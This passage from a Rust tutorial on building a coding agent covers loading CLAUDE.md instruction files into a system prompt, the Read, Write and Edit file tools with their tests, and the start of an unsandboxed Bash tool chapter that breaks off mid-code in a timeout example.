discover() -- walking upward
The discover() method starts at a given directory and walks toward the
filesystem root, checking each directory for the target files:
```rust
pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());
    while let Some(current) = dir {
        for name in &self.file_names {
            let candidate = current.join(name);
            if candidate.is_file() {
                found.push(candidate);
            }
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }
    found.reverse(); // Root-first order
    found
}
```
The walk collects files from the start directory up to the root, then reverses the list so root-level files come first. This ordering matters: global instructions appear before project-specific ones, and the LLM sees the most specific instructions last (closest to the user prompt).
Consider a project at /home/user/project/backend:
/home/user/CLAUDE.md <-- global preferences
/home/user/project/CLAUDE.md <-- project conventions
/home/user/project/backend/CLAUDE.md <-- backend-specific rules
After discover(), the vector contains them in that order: global first, most
specific last.
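You can verify the root-first ordering with a std-only sketch that mirrors `discover()` for a single file name (`walk_up` is an illustrative free function, not the starter's API):

```rust
use std::path::{Path, PathBuf};

// Walk from `start` toward the filesystem root, collecting every existing
// file called `name`, then reverse so root-level files come first.
fn walk_up(start: &Path, name: &str) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start.to_path_buf());
    while let Some(current) = dir {
        let candidate = current.join(name);
        if candidate.is_file() {
            found.push(candidate);
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }
    found.reverse();
    found
}
```

Creating `CLAUDE.md` at two levels of a temp directory and calling `walk_up` from the deeper one returns the shallower (more global) file first.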
load() -- reading and concatenating
The load() method calls discover(), reads each file, and joins them into a
single string. Each file's content is prefixed with # Instructions from <path>
so the LLM knows where each block came from. Files are separated by ---
markers. Empty or unreadable files are silently skipped. If no instruction files
exist at all, load() returns None.
The output for two files looks like:
# Instructions from /home/user/CLAUDE.md
Use American English. Prefer explicit error handling.
---
# Instructions from /home/user/project/CLAUDE.md
Run tests with `cargo test`. Never modify generated files.
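A std-only sketch of this concatenation, written over an already-discovered file list (`load_instructions` is an illustrative free function, not the starter's method, which also calls `discover()` internally):

```rust
use std::fs;
use std::path::PathBuf;

// Join each readable, non-empty file under a header naming its source path,
// separated by `---` markers. Returns None when nothing was loaded.
fn load_instructions(files: &[PathBuf]) -> Option<String> {
    let mut blocks = Vec::new();
    for path in files {
        if let Ok(content) = fs::read_to_string(path) {
            let trimmed = content.trim();
            if !trimmed.is_empty() {
                blocks.push(format!("# Instructions from {}\n\n{trimmed}", path.display()));
            }
        }
        // Unreadable files are silently skipped, matching the spec above.
    }
    if blocks.is_empty() {
        None
    } else {
        Some(blocks.join("\n\n---\n\n"))
    }
}
```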
system_prompt_section() -- wrapping for the prompt
The system_prompt_section() method calls load() and wraps the result with
an instruction preamble. This produces a string ready to insert into a system
prompt. If no instruction files are found, it returns None.
The exact preamble should read:
```rust
format!(
    "The following project instructions were loaded automatically. \
     Follow them carefully:\n\n{content}"
)
```
The test checks for the substring "project instructions" in the output, so
your preamble text must include those words.
Using InstructionLoader in a system prompt
In a production agent, the instruction loader is wired into the prompt assembly pipeline. The loaded instructions are always dynamic -- they depend on which directory the agent is launched from.
Here is how you might use InstructionLoader to build a simple system prompt:
```rust
let mut prompt = String::from("You are a coding agent.\n\n");
let loader = InstructionLoader::default_files();
if let Some(section) = loader.system_prompt_section(Path::new(cwd)) {
    prompt.push_str(&section);
}
```
A more sophisticated agent would separate static and dynamic sections for prompt caching (see the concepts discussion above), but this simple approach works well for getting started.
How Claude Code does it
Claude Code's prompt assembly follows the same principles at larger scale. Its system prompt includes identity, safety rules, tool schemas, behavioral guidelines, environment details, CLAUDE.md instructions from multiple levels, and session metadata -- routinely exceeding 900 lines.
Without prompt caching, every API call would reprocess all of that. Claude Code
marks the cache boundary with a SYSTEM_PROMPT_DYNAMIC_BOUNDARY marker. The
provider splits the system message at this boundary and sends the prefix with
cache_control: { type: "ephemeral" }. The API caches the prefix's internal
representation and reuses it for subsequent requests, often covering 80%+ of
the prompt.
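Concretely, in Anthropic's Messages API the split shows up as a system prompt sent as an array of text blocks, where the last static block carries the `cache_control` marker. The payload below is a pared-down sketch, not a complete request:

```json
{
  "system": [
    {
      "type": "text",
      "text": "You are a coding agent. (static: identity, rules, tool guidance)",
      "cache_control": { "type": "ephemeral" }
    },
    {
      "type": "text",
      "text": "(dynamic: current directory, session metadata)"
    }
  ],
  "messages": []
}
```

Everything up to and including the block with `cache_control` is eligible for caching; everything after it is reprocessed on each request.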
As an extension, you could build a SystemPromptBuilder that maintains separate
lists of static and dynamic sections, renders each half independently, and lets
a cache-aware provider split the prompt at the boundary. Our starter focuses on
the instruction loading piece, which is the most practically useful component.
Running the tests
Run the InstructionLoader tests:
cargo test -p mini-claw-code-starter instructions
What the tests verify
- `test_instructions_instruction_loader_discover`: creates a temp directory with a CLAUDE.md file and verifies `discover()` finds it.
- `test_instructions_instruction_loader_load`: same setup; verifies `load()` returns the file's content.
- `test_instructions_instruction_loader_no_files`: no instruction files exist; `load()` returns `None`.
Recap
You have built the instruction loading infrastructure:
- `InstructionLoader` discovers CLAUDE.md files by walking up the filesystem. It concatenates them in root-first order so that global instructions appear before project-specific ones.
- `system_prompt_section()` wraps discovered instructions for inclusion in a system prompt.
You also learned the key concepts behind production system prompt architecture:
- Prompt sections break the system prompt into named, modular chunks.
- The cache boundary separates what changes from what does not, enabling prompt caching -- a single optimization that can cut costs and latency by an order of magnitude on long prompts. Every production agent does this.
As an extension, you could implement PromptSection and SystemPromptBuilder
types to manage the static/dynamic split structurally. The reference
implementation (mini-claw-code) shows one approach.
Key takeaway
A system prompt is not a single string -- it is an assembly of modular sections, ordered so that stable content comes first (enabling prompt caching) and session-specific content comes last. The InstructionLoader is the simplest but most user-facing piece of this assembly: it gives every project a way to customize the agent's behavior through plain Markdown files.
What's next
In Chapter 9: File Tools you will implement the tools that let your agent interact with the filesystem -- reading, writing, and editing files. These are the tools whose schemas will eventually appear in the static portion of your system prompt.
Check yourself
← Chapter 7: The Agentic Loop (Deep Dive) · Contents · Chapter 9: File Tools →
Chapter 9: File Tools
File(s) to edit:
`src/tools/write.rs`, `src/tools/edit.rs` (the `TODO ch9:` stubs). `src/tools/read.rs` was completed back in Chapter 2 -- this chapter revisits it as the baseline and contrasts it with the design decisions that come with writing and editing.
Tests to run: `cargo test -p mini-claw-code-starter test_read_` (ReadTool), `cargo test -p mini-claw-code-starter test_write_` (WriteTool), `cargo test -p mini-claw-code-starter test_edit_` (EditTool)
Estimated time: 50 min
Goal
- Revisit `ReadTool` (built in Chapter 2) as the baseline and understand the trade-offs of its minimal design vs. production tools that add line numbering and offset/limit.
- Implement `WriteTool` with automatic parent directory creation so the agent can create new files without a separate `mkdir` step.
- Implement `EditTool` with a uniqueness check so the agent can make surgical string replacements in existing files.
- Understand why tool errors are returned as `Err(...)` in the starter (the agent loop converts them to messages the LLM can read and recover from -- the detailed rationale is in Chapter 6 §"Why tool errors never terminate the agent").
A coding agent that cannot touch the filesystem is just a chatbot with delusions of grandeur. It can describe code changes, suggest fixes, explain algorithms -- but it cannot do any of it. The tools you built in Chapter 6 gave your agent hands. In this chapter you give those hands something to hold: files.
File operations are the most fundamental tools in any coding agent's toolkit.
Claude Code ships with Read, Write, and Edit tools (among many others), and
every competitor -- Cursor, Aider, OpenCode -- has its own version. The
operations are simple (read bytes, write bytes, search-and-replace), but the
design choices around them determine whether the agent can reliably modify a
codebase or whether it stumbles over its own edits. You will implement all three
tools in this chapter: ReadTool, WriteTool, and EditTool.
How the file tools work together
```mermaid
flowchart LR
    W[WriteTool] -->|creates file| FS[(Filesystem)]
    E[EditTool] -->|search & replace| FS
    R[ReadTool] -->|reads content| FS
    W -.->|"auto-creates parent dirs"| FS
    E -.->|"checks uniqueness first"| FS
```
```mermaid
sequenceDiagram
    participant LLM
    participant Agent
    participant FS as Filesystem
    LLM->>Agent: write(path, content)
    Agent->>FS: create dirs + write file
    FS-->>Agent: ok
    Agent-->>LLM: "wrote /path/to/file"
    LLM->>Agent: edit(path, old, new)
    Agent->>FS: read, check uniqueness, replace, write
    FS-->>Agent: ok
    Agent-->>LLM: "edited /path/to/file"
    LLM->>Agent: read(path)
    Agent->>FS: read file
    FS-->>Agent: file contents
    Agent-->>LLM: file contents
```
9.1 ReadTool
ReadTool is the simplest of the file tools: it takes a path, reads the file
with tokio::fs::read_to_string, and returns the raw contents as a string. No
line numbering, no offset/limit, no transformation. That is what both the
starter and the reference implementation (mini-claw-code/src/tools/read.rs)
do -- we keep it deliberately minimal so the rest of the chapter (Write, Edit)
has room to breathe.
Design discussion: why production agents add more
Production agents like Claude Code go further. Their read tool typically
numbers every line (cat -n style) and supports partial reads via offset and
limit parameters. Two reasons this matters in real systems:
- Line numbers give the LLM a coordinate system. "Replace the string on line 42" is precise. "Replace the string somewhere around the middle of the function" is not. This becomes especially valuable for the Edit tool, where the model has to produce an exact string to match and numbered lines help it copy the right chunk.
- Offset/limit protects the context window. A single 50k-line generated file can blow past the model's context. Paginated reads let the LLM fetch what it needs without burning the whole budget on one file.
Neither of these appears in the starter or the reference implementation in
this book -- they are extensions we point at but deliberately leave out so the
core Tool implementation stays a dozen lines. Adding them yourself is one of
the listed extensions at the end of the chapter.
The starter stub
Open src/tools/read.rs:
```rust
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct ReadTool {
    definition: ToolDefinition,
}

impl Default for ReadTool {
    fn default() -> Self {
        Self::new()
    }
}

impl ReadTool {
    /// Create a new ReadTool with its JSON schema definition.
    ///
    /// The schema should declare one required parameter: "path" (string).
    pub fn new() -> Self {
        unimplemented!(
            "Create a ToolDefinition with name \"read\" and a required \"path\" parameter"
        )
    }
}

#[async_trait::async_trait]
impl Tool for ReadTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract \"path\" from args, read file with tokio::fs::read_to_string, return contents"
        )
    }
}
```
You need to fill in two methods:
- `new()` -- build a `ToolDefinition` with name `"read"` and a required `"path"` parameter.
- `call()` -- extract the path, read the file, and return its contents.
Implementing the ReadTool
The definition. One required parameter: path. The LLM sees this as a JSON
Schema and knows it must provide path.
```rust
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("read", "Read the contents of a file.")
            .param("path", "string", "Absolute path to the file", true),
    }
}
```
The call() method. Read the file and return its contents as a String:
```rust
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let content = tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))?;
    Ok(content)
}
```
Rust concept: anyhow::Context for rich errors
The .context("missing 'path' argument")? and .with_context(|| format!("failed to read '{path}'")) calls wrap the underlying error with a human-readable message. context() takes a static string; with_context() takes a closure for dynamic messages (avoiding the allocation when the ? path is not taken). Both return anyhow::Error, which chains the original error underneath -- so the full error message reads like "failed to read 'foo.rs': No such file or directory". This chaining is what makes anyhow errors informative without custom error types.
Notice that call() returns anyhow::Result<String>, not ToolResult. The
starter's Tool trait is simplified -- tools return plain strings on success.
If the tool encounters an error (missing argument, I/O failure), it returns
Err(...). The agent loop converts errors to error messages that the LLM sees.
Possible extensions. A production-grade ReadTool would add offset and
limit parameters for partial reads and format output with tab-separated line
numbers (like cat -n). Neither is in this book's reference implementation;
both are well-scoped exercises if you want to go further.
What the output looks like
Given a file with three lines:
alpha
beta
gamma
The tool returns the raw file contents:
alpha
beta
gamma
This is the simplest approach. Production tools extend it with line numbers and partial-read support, which are useful for large files and for giving the LLM precise line references for later edits -- see the design discussion above.
9.2 WriteTool
Writing a file is conceptually simple: take a path and content, write the content to the path. But there is one practical detail that makes a big difference: creating parent directories automatically.
When the LLM writes src/handlers/auth/middleware.rs, the src/handlers/auth/
directory might not exist yet. A naive tool would fail with "No such file or
directory." The agent would then need to call bash("mkdir -p ...") and retry.
This wastes a tool-use round and confuses the model. Better to handle it
silently.
The starter stub
Open src/tools/write.rs:
```rust
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct WriteTool {
    definition: ToolDefinition,
}

impl Default for WriteTool {
    fn default() -> Self {
        Self::new()
    }
}

impl WriteTool {
    /// Schema: required "path" and "content" parameters.
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...).param(...)"
        )
    }
}

#[async_trait::async_trait]
impl Tool for WriteTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract path and content, create parent dirs, write file, return format!(\"wrote {path}\")"
        )
    }
}
```
Implementing the WriteTool
The definition. Two required parameters: path and content.
```rust
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new(
            "write",
            "Write content to a file, creating directories as needed",
        )
        .param("path", "string", "Absolute path to write to", true)
        .param("content", "string", "Content to write", true),
    }
}
```
The call() method. Extract the arguments, create parent directories,
write the file, and return a confirmation string:
```rust
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let content = args["content"]
        .as_str()
        .context("missing 'content' argument")?;

    // Create parent directories
    if let Some(parent) = std::path::Path::new(path).parent() {
        if !parent.as_os_str().is_empty() {
            tokio::fs::create_dir_all(parent).await?;
        }
    }

    tokio::fs::write(path, content).await?;
    Ok(format!("wrote {path}"))
}
```
The return value is format!("wrote {path}") -- a simple confirmation string.
The agent sees this and knows the write succeeded.
Walking through the code
Two required parameters. Both path and content are required. There is no
optional behavior here -- you always need both.
Auto-creating directories. The create_dir_all call is the key design
choice. It mirrors mkdir -p -- if the directory already exists, it is a no-op.
If intermediate directories are missing, it creates them all. The guard
!parent.as_os_str().is_empty() handles the edge case where the path has no
parent component (e.g., a bare filename like "file.txt"), where calling
create_dir_all("") would fail.
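The edge case is easy to confirm with std alone: a bare relative filename has `Some("")` as its parent rather than `None`, which is exactly why the guard checks for emptiness. A small illustrative helper (`needs_no_mkdir` is a hypothetical name, not part of the starter):

```rust
use std::path::Path;

// Returns true when `path` needs no directory creation before writing:
// either it has no parent component, or the parent is the empty path.
fn needs_no_mkdir(path: &str) -> bool {
    match Path::new(path).parent() {
        None => true,
        Some(p) => p.as_os_str().is_empty(),
    }
}
```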
Overwrite semantics. tokio::fs::write overwrites the file if it already
exists and creates it if it does not. There is no append mode, no conflict
detection. This is deliberate -- the tool is a clean write, not a merge. If the
LLM wants to modify an existing file, it should use the Edit tool.
Confirmation string. The result reports "wrote /path/to/file". This gives
the model confirmation that the write succeeded.
9.3 EditTool
The Edit tool is the most interesting of the three, and it teaches the most important design lesson in this book: errors are values, not exceptions.
The Edit tool performs a search-and-replace on a file. It takes a path, an
old_string to find, and a new_string to replace it with. The critical
constraint: old_string must appear exactly once in the file. Zero matches
means the model got the string wrong. More than one match means the replacement
is ambiguous -- we do not know which occurrence to change.
Both of these are expected failure modes, not bugs. The model frequently gets strings slightly wrong (missing whitespace, wrong indentation, stale content from a previous edit). The tool must report these failures clearly so the model can correct itself.
The starter stub
Open src/tools/edit.rs:
```rust
use anyhow::{Context, bail};
use serde_json::Value;

use crate::types::*;

pub struct EditTool {
    definition: ToolDefinition,
}

impl Default for EditTool {
    fn default() -> Self {
        Self::new()
    }
}

impl EditTool {
    /// Schema: required "path", "old_string", "new_string" parameters.
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...).param(...).param(...)"
        )
    }
}

#[async_trait::async_trait]
impl Tool for EditTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract args, read file, verify old_string appears exactly once, replace, write back"
        )
    }
}
```
Implementing the EditTool
The definition. Three required parameters: path, old_string, and
new_string.
```rust
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new(
            "edit",
            "Replace an exact string in a file. The old_string must appear exactly once.",
        )
        .param("path", "string", "Absolute path to the file to edit", true)
        .param("old_string", "string", "The exact string to find", true)
        .param("new_string", "string", "The replacement string", true),
    }
}
```
The call() method. Read the file, check uniqueness, replace, write back:
```rust
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    let old = args["old_string"]
        .as_str()
        .context("missing 'old_string' argument")?;
    let new = args["new_string"]
        .as_str()
        .context("missing 'new_string' argument")?;

    let content = tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))?;

    let count = content.matches(old).count();
    if count == 0 {
        bail!("old_string not found in '{path}'");
    }
    if count > 1 {
        bail!("old_string appears {count} times in '{path}', must be unique");
    }

    let updated = content.replacen(old, new, 1);
    tokio::fs::write(path, &updated).await?;
    Ok(format!("edited {path}"))
}
```
The return value is format!("edited {path}") on success.
Walking through the code
Three required parameters. path, old_string, and new_string are all
required. The model must specify exactly what to find and what to replace it
with. There is no regex, no line-number-based editing, no diff format. Just
plain string replacement. This simplicity is a feature -- it is unambiguous and
easy for the model to use correctly.
The uniqueness check. This is the heart of the tool:
```rust
let count = content.matches(old).count();
if count == 0 {
    bail!("old_string not found in '{path}'");
}
if count > 1 {
    bail!("old_string appears {count} times in '{path}', must be unique");
}
```
Rust concept: bail! macro
bail!("old_string not found in '{path}'") is shorthand for return Err(anyhow::anyhow!("...")). It immediately returns an error from the function with the given message. It is part of the anyhow crate and works in any function that returns anyhow::Result. Compare with ? (which propagates an existing error) -- bail! creates a new error on the spot.
Two branches, both returning errors via bail!. In the starter's simplified
Tool trait, tools return anyhow::Result<String>. When the tool returns an
Err, the agent loop converts it to an error message that the LLM sees. The
model can then retry with a corrected string.
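The check itself boils down to two std string methods, `matches().count()` and `replacen()`. A pure-string distillation (`replace_unique` is an illustrative name, and it returns `Result<String, String>` instead of `anyhow::Result` to stay std-only):

```rust
// Replace `old` with `new` only if `old` occurs exactly once.
fn replace_unique(content: &str, old: &str, new: &str) -> Result<String, String> {
    // `matches` yields non-overlapping occurrences; `count` gives the total.
    let count = content.matches(old).count();
    if count == 0 {
        return Err("old_string not found".to_string());
    }
    if count > 1 {
        return Err(format!("old_string appears {count} times, must be unique"));
    }
    // `replacen(.., 1)` replaces only the first (and here, only) occurrence.
    Ok(content.replacen(old, new, 1))
}
```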
Error handling in the simplified trait
The starter's Tool trait returns anyhow::Result<String> from call(). This
means error handling is straightforward -- use bail!() or ? for any failure,
and the agent loop takes care of converting errors to messages the LLM can read.
In the agent's execute_tools method, a tool call is handled like this:
```rust
match tool.call(call.arguments.clone()).await {
    Ok(result) => result,
    Err(e) => format!("error: {e}"),
}
```
An Err from call() becomes a string like "error: old_string not found in 'foo.rs'".
The model sees this and knows to try a different string.
A more sophisticated design (used by Claude Code) distinguishes between
recoverable tool-level errors (returned as success values) and genuine I/O
failures (returned as Err). The starter keeps things simple by using Err
for both -- the agent loop handles them the same way regardless.
9.4 Integration: Write, Edit, Read
The real power of these tools comes from combining them. A typical agent workflow looks like this:
- Write a new file
- Edit to fix a bug or refine the code
- Read to verify the result
Here is what that looks like as tool calls:
Agent: I'll create the handler file.
-> write(path: "/tmp/project/handler.rs", content: "fn main() { println!(\"hello\"); }")
<- "wrote /tmp/project/handler.rs"
Agent: Let me update the greeting.
-> edit(path: "/tmp/project/handler.rs", old_string: "hello", new_string: "goodbye")
<- "edited /tmp/project/handler.rs"
Agent: Let me verify the change.
-> read(path: "/tmp/project/handler.rs")
<- "fn main() { println!(\"goodbye\"); }"
Each tool does one thing and communicates its result clearly. The agent sees the output of each step and decides what to do next. If the edit had failed (wrong string), the agent would see the error and retry with the correct string.
This write-edit-read pattern is how Claude Code modifies files in practice. It does not generate a complete file and overwrite -- that would lose any content outside the modified section. Instead, it uses surgical edits on the specific lines that need to change, then reads the result to confirm. This is more reliable and produces smaller diffs.
9.5 How Claude Code does it
Claude Code's file tools follow the same protocol but with more sophistication:
Read supports images and PDFs. It detects binary files and renders them appropriately (base64-encoded images are sent as multimodal content blocks). It has smarter truncation with token counting rather than character counting, and it warns when a file is empty.
Write checks for protected files. Claude Code maintains a list of files
that should never be overwritten (.env, credentials.json, etc.) and blocks
writes to them. It also integrates with the permission system to require user
approval before overwriting existing files in certain modes.
Edit is considerably more powerful. It supports multiple edits in a single call, has a diff preview mode, handles encoding detection, and validates that the edit produces syntactically valid code (for supported languages). It also has a more nuanced uniqueness check that considers context lines around the match to disambiguate.
But the core protocol is identical to what you just built. A struct holds the
definition. The Tool trait provides the interface. The call method does
the work. The agent loop dispatches and collects results. Understanding our
three simple tools gives you the foundation to understand Claude Code's full
tool suite.
9.6 Tool file organization
All three tools live in src/tools/, alongside the other tools you will build
in later chapters. The module structure in the starter:
src/tools/
mod.rs -- re-exports all tools
ask.rs -- AskTool (bonus)
bash.rs -- BashTool (Chapter 10)
edit.rs -- EditTool
read.rs -- ReadTool
write.rs -- WriteTool
The mod.rs barrel re-exports everything:
```rust
mod ask;
mod bash;
mod edit;
mod read;
mod write;

pub use ask::*;
pub use bash::BashTool;
pub use edit::EditTool;
pub use read::ReadTool;
pub use write::WriteTool;
```
This lets consumers write use crate::tools::{ReadTool, WriteTool, EditTool}
without reaching into individual modules.
9.7 Tests
Run the file tool tests:
cargo test -p mini-claw-code-starter test_read_ # ReadTool
cargo test -p mini-claw-code-starter test_write_ # WriteTool
cargo test -p mini-claw-code-starter test_edit_ # EditTool
Cargo test filters are substring matches, not regexes, so you cannot OR the
three prefixes together into a single invocation. Run the three commands
separately, or drop the filter entirely
(`cargo test -p mini-claw-code-starter`) to run every test in the crate at
once.
Here is what each test verifies:
ReadTool tests (in `test_read_`)
- `test_read_read_definition` -- checks that the tool definition has the name "read".
- `test_read_read_file` -- reads a file and verifies the content appears in the output.
- `test_read_read_missing_file` -- attempts to read a file that does not exist; verifies the result is an `Err`.
WriteTool tests (in `test_write_`)
- `test_write_creates_file` -- writes content to a new file, verifies the result contains a confirmation, and reads back the file to confirm the content.
- `test_write_creates_dirs` -- writes to a file inside nested directories; all intermediate directories are created automatically.
- `test_write_overwrites_existing` -- writes to a file that already has content; verifies the old content is replaced.
EditTool tests (in `test_edit_`)
- `test_edit_replaces_string` -- edits a string in a file; verifies the result says "edited" and the file is updated.
- `test_edit_not_found` -- attempts to replace a string that does not exist; verifies the result is an `Err`.
- `test_edit_not_unique` -- attempts to replace a string that appears multiple times; verifies the error mentions the ambiguity.
Recap
Three tools, one pattern. Every tool in this chapter follows the same structure:
- A struct with a `definition: ToolDefinition` field.
- A `new()` constructor that builds the definition with the parameter builder from Chapter 4.
- A `Tool` impl with `definition()` and `call()`.
The pattern scales. When you add Bash in Chapter 10, the shape is identical --
only the call() logic changes. This is the power of the Tool trait: a
uniform interface that makes every tool interchangeable from the agent's
perspective.
The key lessons from this chapter:
- Automate the obvious. The `WriteTool` creates parent directories automatically, saving the agent a wasted tool-use round.
- Check uniqueness. The `EditTool` requires the old string to appear exactly once. Zero matches means the model got the string wrong; multiple matches means the replacement is ambiguous.
- Errors propagate cleanly. Tools return `anyhow::Result<String>`. The agent loop catches errors and converts them to messages the LLM can read and recover from.
Key takeaway
File tools are the agent's hands on the codebase. The three-tool split -- read, write, edit -- gives the LLM clear verbs for distinct operations rather than one overloaded "file" tool. The EditTool's uniqueness check is the single most important design decision: it forces the LLM to provide an unambiguous match, catching mistakes early and enabling reliable self-correction.
In Chapter 10: Bash Tool, you will build the most powerful (and most dangerous) tool in the agent's arsenal -- one that can run arbitrary shell commands.
Check yourself
← Chapter 8: System Prompt · Contents · Chapter 10: Bash Tool →
Chapter 10: Bash Tool
File(s) to edit:
`src/tools/bash.rs`
Test to run: `cargo test -p mini-claw-code-starter test_bash_`
Estimated time: 35 min
Goal
- Implement `BashTool` so the agent can run arbitrary shell commands via `bash -c` and capture combined stdout/stderr output.
- Handle the three output cases correctly: stdout only, stderr only, and no output (the `"(no output)"` sentinel).
- Understand why the tool has no safety rails in this chapter and what later chapters add (permissions, command classification, hooks).
The bash tool is the most powerful tool in a coding agent. It is also the most dangerous. With a single tool call, the LLM can compile code, run tests, install packages, inspect processes, query databases, or delete your entire filesystem. Every other tool -- read, write, edit, grep -- does one thing. Bash does everything.
This power is what makes a coding agent useful. An agent that can only read and write files is a fancy text editor. An agent that can run arbitrary shell commands is a programmer. It can try things, see what happens, and iterate -- the same workflow a human developer follows. Claude Code's bash tool is its most-used tool by far, accounting for the majority of all tool invocations in a typical session.
In this chapter you will build the BashTool. It takes a command string, runs it in a bash subprocess, and returns the combined output. (A timeout is shown later as an extension.) The implementation is straightforward -- the hard part is everything we deliberately leave out. There is no sandboxing, no command filtering, no permission checking. The LLM can run anything. Chapters 13-16 add the safety rails. For now, we build the engine and trust the driver.
How the BashTool processes a command
```mermaid
flowchart TD
    A[LLM sends ToolCall: bash] --> B[Extract command from args]
    B --> C[tokio::process::Command::new bash -c command]
    C --> D[.output captures stdout + stderr]
    D --> E{stdout empty?}
    E -->|No| F[Add stdout to result]
    E -->|Yes| G[Skip]
    F --> H{stderr empty?}
    G --> H
    H -->|No| I["Add 'stderr: ' + stderr"]
    H -->|Yes| J[Skip]
    I --> K{result empty?}
    J --> K
    K -->|Yes| L["Return '(no output)'"]
    K -->|No| M[Return combined result]
```
The BashTool
Open src/tools/bash.rs. Here is the starter stub:
```rust
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct BashTool {
    definition: ToolDefinition,
}

impl Default for BashTool {
    fn default() -> Self {
        Self::new()
    }
}

impl BashTool {
    /// Schema: one required "command" parameter (string).
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...) to define a required \"command\" parameter"
        )
    }
}

#[async_trait::async_trait]
impl Tool for BashTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract command, run bash -c, combine stdout + stderr, return \"(no output)\" if both empty"
        )
    }
}
```
You need to fill in new() and call(). Here is the complete implementation:
```rust
impl BashTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("bash", "Run a bash command and return its output")
                .param("command", "string", "The bash command to run", true),
        }
    }
}

#[async_trait::async_trait]
impl Tool for BashTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let command = args["command"]
            .as_str()
            .context("missing 'command' argument")?;

        let output = tokio::process::Command::new("bash")
            .arg("-c")
            .arg(command)
            .output()
            .await?;

        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);

        let mut result = String::new();
        if !stdout.is_empty() {
            result.push_str(&stdout);
        }
        if !stderr.is_empty() {
            if !result.is_empty() {
                result.push('\n');
            }
            result.push_str("stderr: ");
            result.push_str(&stderr);
        }
        if result.is_empty() {
            result.push_str("(no output)");
        }
        Ok(result)
    }
}
```
Let's walk through each piece.
The definition
```rust
ToolDefinition::new("bash", "Run a bash command and return its output")
    .param("command", "string", "The bash command to run", true)
```
One required parameter: command -- the shell command to execute. The
description "Run a bash command and return its output" is deliberately simple.
The LLM already knows what bash is. Over-describing the tool wastes prompt
tokens and can confuse the model into overthinking when to use it.
As an extension, you could add a timeout parameter to let the LLM override
the default timeout for long-running commands. The reference implementation
includes this.
Argument extraction
```rust
let command = args["command"]
    .as_str()
    .context("missing 'command' argument")?;
```
The command extraction uses .context(...) with ? to return an Err if the argument is missing. A bash call without a command is a protocol violation, not a tool failure. The LLM should never produce this, and if it does, the agent's error handling will catch it.
Running the command
```rust
let output = tokio::process::Command::new("bash")
    .arg("-c")
    .arg(command)
    .output()
    .await?;
```
Rust concept: tokio::process::Command vs std::process::Command
tokio::process::Command is the async counterpart of std::process::Command. The key difference: std's version blocks the current OS thread while waiting for the subprocess to finish. In an async runtime like Tokio, blocking a thread means the runtime cannot make progress on other tasks (other tool calls, streaming events, UI updates). tokio's version yields to the runtime while waiting, so the thread can do useful work. Always use tokio::process inside async fn -- using std::process in an async context is a common mistake that leads to performance problems or deadlocks under load.
Two layers here, each doing one thing:
- `tokio::process::Command` spawns an async subprocess. We use `bash -c` so the command string is interpreted by bash, not executed as a raw binary. This means pipes, redirects, semicolons, and all other shell features work: `echo hello | wc -c`, `ls > out.txt`, `cd /tmp && pwd`.
- `.output()` collects the process's stdout, stderr, and exit status. This buffers everything in memory. For a production agent you would want streaming (pipe stdout/stderr to the TUI in real time), but buffered collection is simpler and sufficient for our purposes.
If the process fails to spawn (bash not found, OS refuses to create the process),
the ? operator propagates the error up. The agent loop catches it and reports
it to the LLM.
Adding a timeout (extension)
Without a timeout, a single bad command can hang the agent forever. The LLM might run sleep infinity, start a server that listens on a port, or trigger an interactive program that waits for stdin. Any of these blocks the agent loop indefinitely -- no more tool calls, no more responses, just a frozen process burning compute.
As an extension, you can wrap the command in tokio::time::timeout:
```rust
let output = tokio::time::timeout(
    std::time::Duration::from_secs(120),
    tokio::process::Command::new("bash")
        .arg("-c")
        .arg(command)
        .output(),
)
.await;
```
This produces a nested Result: Ok(Ok(output)) for success, Ok(Err(e))
for spawn failures, and Err(_) for timeouts. The reference implementation
includes this pattern.
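The three-way handling can be rehearsed on plain std types before wiring it into the tool. This is a sketch: `RunError`, `flatten`, and the stand-in error types (`String` for spawn errors, `()` for the elapsed timeout) are illustrative, not part of the starter.

```rust
// Sketch: flattening the nested Result shape that tokio::time::timeout
// produces around a fallible future. The error types here are stand-ins.
#[derive(Debug, PartialEq)]
enum RunError {
    Timeout,
    Spawn(String),
}

// Ok(Ok(v))  -> the command completed
// Ok(Err(e)) -> the spawn itself failed
// Err(())    -> the timeout elapsed first
fn flatten(nested: Result<Result<String, String>, ()>) -> Result<String, RunError> {
    match nested {
        Ok(Ok(output)) => Ok(output),
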